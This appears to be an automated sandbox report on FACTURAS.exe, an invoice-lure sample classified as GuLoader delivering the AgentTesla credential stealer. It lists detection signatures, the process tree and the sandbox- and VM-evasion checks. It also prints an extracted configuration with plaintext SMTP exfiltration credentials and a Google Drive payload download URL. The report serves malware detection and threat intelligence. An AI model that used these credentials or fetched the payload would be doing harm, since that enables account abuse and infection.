Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:FACTURAS.exe
Analysis ID:539521
MD5:2332fdde9344114749db5496eef5f5f9
SHA1:303c40dd112294dc012836be48eb38e8af056432
SHA256:0e693b9dcb4ccb3e64cb61396447dd4e3871234b4af80c2d57e4fbc9b6268a61
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • FACTURAS.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 2332FDDE9344114749DB5496EEF5F5F9)
    • CasPol.exe (PID: 5172 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 5196 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlD'"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 5196JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 5196JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlD'"}
            Source: CasPol.exe.5172.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: FACTURAS.exeVirustotal: Detection: 40%Perma Link
            Source: FACTURAS.exeMetadefender: Detection: 38%Perma Link
            Source: FACTURAS.exeReversingLabs: Detection: 57%
            Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49804 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downlD'
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637414137.0000000000FE2000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637414137.0000000000FE2000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpString found in binary or memory: http://kFWRbv.com
            Source: CasPol.exe, 00000006.00000003.21840136475.0000000000FDF000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000006.00000003.21840136475.0000000000FDF000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/
            Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/1
            Source: CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju
            Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/e
            Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/u
            Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/st
            Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T
            Source: CasPol.exe, 00000006.00000002.22636994763.0000000000F95000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T.
            Source: CasPol.exe, 00000006.00000003.21840176556.0000000000FE6000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9TmPHLwNfjxpm9j9STo
            Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49804 version: TLS 1.2
            Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00B21130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00B24320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00B23A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00B23708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DED5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DED46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DED6AF1
            Source: FACTURAS.exe, 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe
            Source: FACTURAS.exe, 00000001.00000002.21868523702.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSERVICEKONTRAKTS.exeFE2XMURAL@ vs FACTURAS.exe
            Source: FACTURAS.exeBinary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe
            Source: C:\Users\user\Desktop\FACTURAS.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: FACTURAS.exeVirustotal: Detection: 40%
            Source: FACTURAS.exeMetadefender: Detection: 38%
            Source: FACTURAS.exeReversingLabs: Detection: 57%
            Source: FACTURAS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FACTURAS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\FACTURAS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURAS.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\FACTURAS.exeFile created: C:\Users\user\AppData\Roaming\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151Jump to behavior
            Source: C:\Users\user\Desktop\FACTURAS.exeFile created: C:\Users\user\AppData\Local\Temp\~DF503944F8FF7253A1.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@2/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_0040508B pushad ; ret
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_0040755C push cs; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_00407179 push esp; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_00407584 push cs; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_004085B8 push edx; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_00406245 push ecx; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_004072E6 push ebp; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_004042FC push edx; retf
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_0040972A push eax; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_004083D6 pushfd ; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 1_2_023247D6 push 00000063h; iretd
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\FACTURAS.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1E3NVGX3LLHNN9ZF6RWTJDW6FKTCAIH9T
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5956Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9947
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\FACTURAS.exeSystem information queried: ModuleInformation
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWX
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: CasPol.exe, 00000006.00000002.22637364540.0000000000FD8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWM
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000006.00000002.22637364540.0000000000FD8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T
